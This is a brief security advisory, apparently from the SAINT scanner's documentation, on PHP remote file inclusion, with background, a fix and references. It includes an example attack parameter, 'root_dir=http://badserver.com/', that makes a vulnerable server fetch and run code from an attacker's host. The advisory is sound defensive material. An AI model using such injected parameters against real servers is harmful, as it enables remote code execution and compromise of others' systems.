PHP Injection
Updated 5/16/03
Impact
Remote attackers may be able to execute arbitrary PHP commands
on the web server.
Background
PHP (Hypertext Preprocessor) is
a scripting languange used for web development. PHP scripts can
be embedded into HTML files, and are run by the
web server when the file is requested by a web browser.
The Problem
Some PHP scripts do not adequately control important
variables such as the directory path to supporting scripts.
A remote attacker is able to manipulate these variables
by sending specially crafted HTTP requests,
thereby allowing the attacker to run arbitrary PHP scripts.
For example, a PHP script may include the following code:
include($root_dir . 'common.php');
and the default value of the variable $root_dir
may be /var/www/php. In this case, the
PHP processor should execute the script
/var/www/php/common.php within the current
script.
Now suppose an attacker who owns a web server called
badserver.com runs the script with the input
parameter:
root_dir=http://badserver.com/
In this case, the PHP processor would execute the
script http://badserver.com/common.php.
The attacker could execute arbitrary code on the vulnerable
server by placing the code into the common.php
file on his or her own server.
Resolution
To fix this problem, all PHP scripts should properly
initialize directory paths and other important constants, so
they cannot be manipulated by attackers. For fix information
on specific products, see the appropriate reference below.
Note that in many of the affected software products, the
same problem lies in more than one script, even if only
one is reported by SAINT.
Where can I read more about this?
For more information on this and other PHP scripting
vulnerabilities, see
On the Security of PHP by Jordan Dimov.
For more information on specific PHP injection vulnerabilities
see the following advisories: